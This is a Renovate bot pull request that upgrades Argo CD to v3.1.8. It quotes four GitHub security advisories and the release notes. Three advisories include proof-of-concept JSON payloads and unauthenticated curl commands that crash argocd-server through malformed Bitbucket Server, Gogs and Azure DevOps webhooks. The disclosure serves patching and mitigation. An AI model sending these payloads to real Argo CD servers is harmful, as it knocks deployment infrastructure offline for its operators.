Skip to content

fix(deps): update module github.com/argoproj/argo-cd/v3 to v3.1.8 [security]#255

Open
renovate[bot] wants to merge 1 commit intomainfrom
renovate/go-github.com-argoproj-argo-cd-v3-vulnerability
Open

fix(deps): update module github.com/argoproj/argo-cd/v3 to v3.1.8 [security]#255
renovate[bot] wants to merge 1 commit intomainfrom
renovate/go-github.com-argoproj-argo-cd-v3-vulnerability

Conversation

@renovate
Copy link
Copy Markdown
Contributor

@renovate renovate Bot commented Sep 30, 2025
edited
Loading

This PR contains the following updates:

Package Change Age Confidence
github.com/argoproj/argo-cd/v3 v3.1.2v3.1.8 age confidence

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

Repository Credentials Race Condition Crashes Argo CD Server

CVE-2025-55191 / GHSA-g88p-r42r-ppp9

More information

Details

Summary

A race condition in the repository credentials handler can cause the Argo CD server to panic and crash when concurrent operations are performed on the same repository URL.

Details

The vulnerability is located in numerous repository related handlers in the util/db/repository_secrets.go file. For example, in the secretToRepoCred function. The issue manifests as a concurrent map access panic:

concurrent map read and map write
...
goroutine 1104 [running]:
github.com/argoproj/argo-cd/v2/util/db.(*secretsRepositoryBackend).secretToRepoCred(0xc000e50ea8?, 0xc000c65540)
        /go/src/github.com/argoproj/argo-cd/util/db/repository_secrets.go:404 +0x31e

The race condition occurs due to:

  1. Concurrent repository credential operations (create/update/delete) accessing the same map
  2. Kubernetes informer re-syncs happening simultaneously
  3. Background watchers updating the same secret data
  4. No mutex protection for map access

A valid API token with repositories resource permissions (create, update, or delete actions) is required to trigger the race condition.

Impact

This vulnerability causes the entire Argo CD server to crash and become unavailable. Attackers can repeatedly and continuously trigger the race condition to maintain a denial-of-service state, disrupting all GitOps operations. Default ArgoCD configuration is vulnerable.

The affected code was originally introduced in PR #​6103 and released in v2.1.0.

This data race was addressed by deep-copying the Secret objects before reading/writing.

Credits

This vulnerability was found, reported and fixed by:

@​thevilledev

The Argo team would like to thank him for his responsible disclosure and constructive communications during the resolve of this issue.

Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Unauthenticated argocd-server panic via a malicious Bitbucket-Server webhook payload

CVE-2025-59531 / GHSA-f9gq-prrc-hrhc

More information

Details

Summary

Unpatched Argo CD versions are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients.

With the default configuration, no webhook.bitbucketserver.secret set, Argo CD’s /api/webhook endpoint will crash the entire argocd-server process when it receives a Bitbucket-Server push event whose JSON field repository.links.clone is anything other than an array.

A single unauthenticated curl request can push the control-plane into CrashLoopBackOff; repeating the request on each replica causes a complete outage of the API.

Details
// webhook.go (Bitbucket-Server branch in affectedRevisionInfo)

for _, l := range payload.Repository.Links["clone"].([]any) {   // <- unsafe cast
    link := l.(map[string]any)
    ...
}

If links.clone is a string, number, object, or null, the first type assertion panics:
interface conversion: interface {} is string, not []interface {}

The worker goroutine created by startWorkerPool lacks a recover, so the panic terminates the whole binary.

PoC

Save as payload-panic.json - note the non-array links.clone.

{
  "eventKey": "repo:refs_changed",
  "repository": {
    "name": "guestbook",
    "fullName": "APP/guestbook",
    "links": { "clone": "boom" }
  },
  "changes": [ { "ref": { "id": "refs/heads/master" } } ]
}
curl -k -X POST https://argocd.example.com/api/webhook \
     -H 'X-Event-Key: repo:refs_changed' \
     -H 'Content-Type: application/json' \
     --data-binary @&#8203;payload-panic.json

Observed crash (argocd-server restart):

panic: interface conversion: interface {} is string, not []interface {}
goroutine 192 [running]:
github.com/argoproj/argo-cd/v3/server/webhook.affectedRevisionInfo
    webhook.go:209 +0x1218
...
Mitigation

If you use Bitbucket Server and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.

If you do not use Bitbucket Server, you can set the webhook secret to a long, random value to effectively disable webhook handling for Bitbucket Server payloads.

apiVersion: v1
kind: Secret
metadata:
  name: argocd-secret
type: Opaque
data:
+  webhook.bitbucketserver.secret: <your base64-encoded secret here>
For more information
Credits

Discovered by Jakub Ciolek at AlphaSense.

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

argo-cd vulnerable unauthenticated DoS via malformed Gogs webhook payload

CVE-2025-59537 / GHSA-wp4p-9pxh-cgx2

More information

Details

Summary

Unpatched Argo CD versions are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients.

With the default configuration, no webhook.gogs.secret set, Argo CD’s /api/webhook endpoint will crash the entire argocd-server process when it receives a Gogs push event whose JSON field commits[].repo is not set or is null.

Details

Users can access /api/webhook without authentication, and when accessing this endpoint, the Handler function parses webhook type messages according to the header (e.g. X-Gogs-Event) and body parameters provided by the user. The Parse function simply unmarshals JSON-type messages. In other words, it returns a data structure even if the data structure is not exactly matched.

The affectedRevisionInfo function parses data according to webhook event types(e.g. gogsclient.PushPayload). However, due to the lack of data structure validation corresponding to these events, an attacker can cause a Denial of Service (DoS) attack by sending maliciously crafted data. because of Repository is Pointer Type.

func affectedRevisionInfo(payloadIf any) (webURLs []string, revision string, change changeInfo, touchedHead bool, changedFiles []string) {
    switch payload := payloadIf.(type) {
        // ...
        case gogsclient.PushPayload:
            webURLs = append(webURLs, payload.Repo.HTMLURL) // bug
            // ...
        }
    return webURLs, revision, change, touchedHead, changedFiles
}
PoC

payload-gogs.json

{
  "ref": "refs/heads/master",
  "before": "0000000000000000000000000000000000000000",
  "after": "0a05129851238652bf806a400af89fa974ade739",
  "commits": [{}]
}
curl -k -v https://argocd.example.com/api/webhook \
  -H 'X-Gogs-Event: push' \
  -H 'Content-Type: application/json' \
  --data-binary @&#8203;/tmp/payload-gogs.json

An attacker can cause a DoS and make the argo-cd service unavailable by continuously sending unauthenticated requests to /api/webhook.

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x68 pc=0x280f494]

goroutine 302 [running]:
github.com/argoproj/argo-cd/v2/util/webhook.affectedRevisionInfo({0x3bd8240?, 0x40005a7030?})
	/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:233 +0x594
github.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).HandleEvent(0x40000f9140, {0x3bd8240?, 0x40005a7030?})
	/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:254 +0x38
github.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).startWorkerPool.func1()
	/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:128 +0x60
created by github.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).startWorkerPool in goroutine 1
	/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:121 +0x28
Mitigation

If you use Gogs and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.

If you do not use Gogs, you can set the webhook secret to a long, random value to effectively disable webhook handling for Gogs payloads.

apiVersion: v1
kind: Secret
metadata:
  name: argocd-secret
type: Opaque
data:
+  webhook.gogs.secret: <your base64-encoded secret here>
For more information
Credit

Sangjun Song (s0ngsari) at Theori (theori.io)

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Argo CD Unauthenticated Remote DoS via malformed Azure DevOps git.push webhook

CVE-2025-59538 / GHSA-gpx4-37g2-c8pv

More information

Details

Summary

In the default configuration, webhook.azuredevops.username and webhook.azuredevops.password not set, Argo CD’s /api/webhook endpoint crashes the entire argocd-server process when it receives an Azure DevOps Push event whose JSON array resource.refUpdates is empty.

The slice index [0] is accessed without a length check, causing an index-out-of-range panic.

A single unauthenticated HTTP POST is enough to kill the process.

Details
case azuredevops.GitPushEvent:
    // util/webhook/webhook.go -- line ≈147
    revision        = ParseRevision(payload.Resource.RefUpdates[0].Name)        // panics if slice empty
    change.shaAfter = ParseRevision(payload.Resource.RefUpdates[0].NewObjectID)
    change.shaBefore= ParseRevision(payload.Resource.RefUpdates[0].OldObjectID)
    touchedHead     = payload.Resource.RefUpdates[0].Name ==
                      payload.Resource.Repository.DefaultBranch

If the attacker supplies "refUpdates": [], the slice has length 0.

The webhook code has no recover(), so the panic terminates the entire binary.

PoC

payload-azure-empty.json:

{
  "eventType": "git.push",
  "resource": {
    "refUpdates": [],
    "repository": {
      "remoteUrl": "https://example.com/dummy",
      "defaultBranch": "refs/heads/master"
    }
  }
}

curl call:

curl -k -X POST https://argocd.example.com/api/webhook \
     -H 'X-Vss-ActivityId: 11111111-1111-1111-1111-111111111111' \
     -H 'Content-Type: application/json' \
     --data-binary @&#8203;payload-azure-empty.json

Observed crash:

panic: runtime error: index out of range [0] with length 0

goroutine 205 [running]:
github.com/argoproj/argo-cd/v3/util/webhook.affectedRevisionInfo
    webhook.go:147 +0x1ea5
...
Mitigation

If you use Azure DevOps and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.

If you do not use Azure DevOps, you can set the webhook secrets to long, random values to effectively disable webhook handling for Azure DevOps payloads.

apiVersion: v1
kind: Secret
metadata:
  name: argocd-secret
type: Opaque
data:
+  webhook.azuredevops.username: <your base64-encoded secret here>
+  webhook.azuredevops.password: <your base64-encoded secret here>
For more information
Credits

Discovered by Jakub Ciolek at AlphaSense.

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Release Notes

argoproj/argo-cd (github.com/argoproj/argo-cd/v3)

v3.1.8

Compare Source

Quick Start

Non-HA:
kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.1.8/manifests/install.yaml
HA:
kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.1.8/manifests/ha/install.yaml

Release Signatures and Provenance

All Argo CD container images are signed by cosign. A Provenance is generated for container images and CLI binaries which meet the SLSA Level 3 specifications. See the documentation on how to verify.

Release Notes Blog Post

For a detailed breakdown of the key changes and improvements in this release, check out the official blog post

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog

Bug fixes
Other work

Full Changelog: argoproj/argo-cd@v3.1.7...v3.1.8

v3.1.7

Compare Source

Quick Start
Non-HA:
kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.1.7/manifests/install.yaml
HA:
kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.1.7/manifests/ha/install.yaml
Release Signatures and Provenance

All Argo CD container images are signed by cosign. A Provenance is generated for container images and CLI binaries which meet the SLSA Level 3 specifications. See the documentation on how to verify.

Release Notes Blog Post

For a detailed breakdown of the key changes and improvements in this release, check out the official blog post

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog
Bug fixes
Other work

Full Changelog: argoproj/argo-cd@v3.1.6...v3.1.7

v3.1.6

Compare Source

Quick Start
Non-HA:
kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.1.6/manifests/install.yaml
HA:
kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.1.6/manifests/ha/install.yaml
Release Signatures and Provenance

All Argo CD container images are signed by cosign. A Provenance is generated for container images and CLI binaries which meet the SLSA Level 3 specifications. See the documentation on how to verify.

Release Notes Blog Post

For a detailed breakdown of the key changes and improvements in this release, check out the official blog post

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog
Bug fixes
Documentation

Full Changelog: argoproj/argo-cd@v3.1.5...v3.1.6

v3.1.5

Compare Source

Quick Start
Non-HA:
kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.1.5/manifests/install.yaml
HA:
kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.1.5/manifests/ha/install.yaml
Release Signatures and Provenance

All Argo CD container images are signed by cosign. A Provenance is generated for container images and CLI binaries which meet the SLSA Level 3 specifications. See the documentation on how to verify.

Release Notes Blog Post

For a detailed breakdown of the key changes and improvements in this release, check out the official blog post

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog
Documentation
Other work

Full Changelog: argoproj/argo-cd@v3.1.4...v3.1.5

v3.1.4

Compare Source

Quick Start
Non-HA:
kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.1.4/manifests/install.yaml
HA:
kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.1.4/manifests/ha/install.yaml
Release Signatures and Provenance

All Argo CD container images are signed by cosign. A Provenance is generated for container images and CLI binaries which meet the SLSA Level 3 specifications. See the documentation on how to verify.

Release Notes Blog Post

For a detailed breakdown of the key changes and improvements in this release, check out the official blog post

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog
Dependency updates

Full Changelog: argoproj/argo-cd@v3.1.3...v3.1.4

v3.1.3

Compare Source

Quick Start
Non-HA:
kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.1.3/manifests/install.yaml
HA:
kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/v3.1.3/manifests/ha/install.yaml
Release Signatures and Provenance

All Argo CD container images are signed by cosign. A Provenance is generated for container images and CLI binaries which meet the SLSA Level 3 specifications. See the documentation on how to verify.

Release Notes Blog Post

For a detailed breakdown of the key changes and improvements in this release, check out the official blog post

Upgrading

If upgrading from a different minor version, be sure to read the upgrading documentation.

Changelog

Full Changelog: argoproj/argo-cd@v3.1.2...v3.1.3

Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate
Copy link
Copy Markdown
Contributor Author

renovate Bot commented Sep 30, 2025

ℹ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

  • 1 additional dependency was updated

Details:

Package Change
github.com/argoproj/gitops-engine v0.7.1-0.20250617174952-093aef0dad58 -> v0.7.1-0.20250905160054-e48120133eec

@codecov
Copy link
Copy Markdown

codecov Bot commented Sep 30, 2025

Codecov Report

✅ All modified and coverable lines are covered by tests.

🚀 New features to boost your workflow:
  • ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
  • 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

@renovate
Copy link
Copy Markdown
Contributor Author

renovate Bot commented Dec 15, 2025

ℹ️ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

  • 1 additional dependency was updated

Details:

Package Change
github.com/argoproj/gitops-engine v0.7.1-0.20250617174952-093aef0dad58 -> v0.7.1-0.20250905160054-e48120133eec

@renovate renovate Bot force-pushed the renovate/go-github.com-argoproj-argo-cd-v3-vulnerability branch from 449dcdf to 8b750fa Compare December 15, 2025 18:03
@renovate renovate Bot force-pushed the renovate/go-github.com-argoproj-argo-cd-v3-vulnerability branch from 8b750fa to 97d7089 Compare March 14, 2026 17:08
@renovate renovate Bot changed the title fix(deps): update module github.com/argoproj/argo-cd/v3 to v3.1.8 [security] fix(deps): update module github.com/argoproj/argo-cd/v3 to v3.1.8 [security] - autoclosed Mar 27, 2026
@renovate renovate Bot closed this Mar 27, 2026
@renovate renovate Bot deleted the renovate/go-github.com-argoproj-argo-cd-v3-vulnerability branch March 27, 2026 01:58
@renovate renovate Bot changed the title fix(deps): update module github.com/argoproj/argo-cd/v3 to v3.1.8 [security] - autoclosed fix(deps): update module github.com/argoproj/argo-cd/v3 to v3.1.8 [security] Mar 30, 2026
@renovate renovate Bot reopened this Mar 30, 2026
@renovate renovate Bot force-pushed the renovate/go-github.com-argoproj-argo-cd-v3-vulnerability branch 2 times, most recently from 97d7089 to 7f3398e Compare March 30, 2026 20:47
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

0 participants